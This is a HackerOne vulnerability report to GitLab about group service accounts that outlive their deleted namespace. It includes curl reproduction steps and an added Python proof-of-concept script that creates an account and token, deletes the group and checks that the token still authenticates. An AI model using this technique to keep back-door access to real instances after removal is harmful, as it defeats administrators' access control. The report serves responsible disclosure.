Service account not deleted when namespace is deleted allowing access to internal projects
HackerOne report #2040822 by joaxcar on 2023-06-27, assigned to GitLab Team
Report
Summary
The new service account feature is subject to the same issue that project and group access tokens previously had: a service account connected to a namespace is not deleted when the namespace is deleted. See the long discussion on the topic at https://hackerone.com/reports/1199561.
The problem is that a user who owns a group on an instance can create a service account, and if an admin removes the user together with all of their projects and groups, the removed user still has access to internal projects through the (now orphaned) service account.
As with group and project access tokens, these namespace-connected service accounts should be deleted when the namespace is deleted.
Steps to reproduce
Use either a group with an unlimited trial on gitlab.com or a self-hosted Premium server. Also make sure you have a personal access token generated for the user you are testing with.
1. Create a new group (or subgroup) and take note of the group ID.
2. Run this in a terminal to create a service account in the group:
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/<group id>/service_accounts"
3. Take note of the service account ID in the response.
4. Now run this command to create a token for the service account:
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/<group id>/service_accounts/<service account id>/personal_access_tokens" --data "scopes[]=api" --data "name=service_accounts_token"
5. Take note of the generated access token.
6. Now use the new access token against the API:
curl --header "PRIVATE-TOKEN: <service_access_token>" "https://gitlab.example.com/api/v4/user"
There is a separate bug that returns an error saying the user needs to accept the terms of service; this does not matter, the response still shows that the service account exists.
7. Now go to https://gitlab.com/groups/NameOfGroup/-/edit, scroll down to "Advanced", expand it, scroll down to "Delete group" and delete the group.
8. Repeat the request from step 6 and see that the service account user still exists even though the group is gone.
This PoC shows that the issue exists. A more involved PoC would include deleting the user and all its groups, and then prove that the service account is still present. I can write up the steps if needed.
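The eight steps above as one script (an added example, not code from the report or from GitLab): it performs the same REST calls with urllib, deletes the group, and reports whether the service-account token still authenticates afterwards. BASE_URL, OWNER_TOKEN and GROUP_ID are hypothetical placeholders, and the SimulatedGitLab transport is a constructed offline stand-in so the flow can be exercised without an instance; swapping in urllib_transport runs it for real.

```python
import json
import urllib.error
import urllib.parse
import urllib.request

BASE_URL = "https://gitlab.example.com"   # hypothetical instance
OWNER_TOKEN = "<your_access_token>"       # token of the group owner (hypothetical)
GROUP_ID = 123                            # hypothetical group ID


def urllib_transport(method, url, headers, body):
    """Real HTTP transport: returns (status, response_text), error responses included."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


class GitLabClient:
    """Tiny /api/v4 client; `transport` is injectable so the flow can run offline."""

    def __init__(self, base_url, token, transport=urllib_transport):
        self.base_url, self.token, self.transport = base_url.rstrip("/"), token, transport

    def call(self, method, path, form=None):
        headers = {"PRIVATE-TOKEN": self.token}
        body = None
        if form is not None:  # doseq=True encodes {"scopes[]": ["api"]} as scopes[]=api
            body = urllib.parse.urlencode(form, doseq=True).encode()
            headers["Content-Type"] = "application/x-www-form-urlencoded"
        status, text = self.transport(method, f"{self.base_url}/api/v4{path}", headers, body)
        try:
            return status, json.loads(text) if text else None
        except json.JSONDecodeError:
            return status, text


def create_service_account(owner, group_id):
    """Step 2: POST /groups/:id/service_accounts, returns the new user's ID."""
    status, payload = owner.call("POST", f"/groups/{group_id}/service_accounts")
    if status != 201:
        raise RuntimeError(f"service account creation failed: {status} {payload}")
    return payload["id"]


def create_service_account_token(owner, group_id, sa_id, name="service_accounts_token"):
    """Step 4: mint an api-scoped personal access token for the service account."""
    status, payload = owner.call(
        "POST", f"/groups/{group_id}/service_accounts/{sa_id}/personal_access_tokens",
        form={"name": name, "scopes[]": ["api"]})
    if status != 201:
        raise RuntimeError(f"token creation failed: {status} {payload}")
    return payload["token"]


def token_still_authenticates(sa_client):
    """Step 6/8: GET /user with the service-account token. Only HTTP 401 counts as
    'token gone'; the terms-of-service error the report mentions still proves the
    account exists (assumption taken from the report)."""
    status, _ = sa_client.call("GET", "/user")
    return status != 401


def delete_group(owner, group_id):
    """Step 7 via the API instead of the UI; GitLab answers 202 Accepted."""
    status, payload = owner.call("DELETE", f"/groups/{group_id}")
    if status not in (200, 202, 204):
        raise RuntimeError(f"group deletion failed: {status} {payload}")


def run_orphan_check(base_url, owner_token, group_id, transport=urllib_transport):
    """Whole procedure in one pass. On instances with delayed group deletion, call
    token_still_authenticates() again once the deletion has actually completed."""
    owner = GitLabClient(base_url, owner_token, transport)
    sa_id = create_service_account(owner, group_id)
    sa = GitLabClient(base_url, create_service_account_token(owner, group_id, sa_id), transport)
    before = token_still_authenticates(sa)
    delete_group(owner, group_id)
    after = token_still_authenticates(sa)
    return {"service_account_id": sa_id, "before_delete": before,
            "after_delete": after, "orphaned": before and after}


class SimulatedGitLab:
    """Constructed offline stand-in for the instance: fixed=False models the reported
    bug, fixed=True the intended behaviour (service account removed with the group)."""

    def __init__(self, fixed):
        self.fixed, self.group_deleted = fixed, False

    def __call__(self, method, url, headers, body):
        is_sa_token = headers["PRIVATE-TOKEN"] == "glpat-simulated-sa"
        if method == "POST" and url.endswith("/service_accounts"):
            return 201, '{"id": 42, "username": "service_account_group_1"}'
        if method == "POST" and url.endswith("/personal_access_tokens"):
            return 201, '{"token": "glpat-simulated-sa"}'
        if method == "DELETE" and "/groups/" in url:
            self.group_deleted = True
            return 202, '{"message": "202 Accepted"}'
        if method == "GET" and url.endswith("/user"):
            if is_sa_token and self.fixed and self.group_deleted:
                return 401, '{"message": "401 Unauthorized"}'
            return 200, '{"id": 42}'
        return 404, '{"message": "404 Not Found"}'


if __name__ == "__main__":
    # Offline run against the simulated bug; pass urllib_transport to test a real instance.
    print(run_orphan_check(BASE_URL, OWNER_TOKEN, GROUP_ID, transport=SimulatedGitLab(fixed=False)))
```

A result with "orphaned": True reproduces the report: the token minted under the deleted group still authenticates. Run it only against a throwaway group, since the group is really deleted.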
Impact
A deleted user can use service accounts as a back door to access internal projects after being removed from the instance. The service accounts have full read access to internal projects and can also create issues and perform other integrity-affecting actions.
How is it working today
Deleting a namespace does not delete the connected service accounts
How it should work
Deleting a namespace should delete any connected service account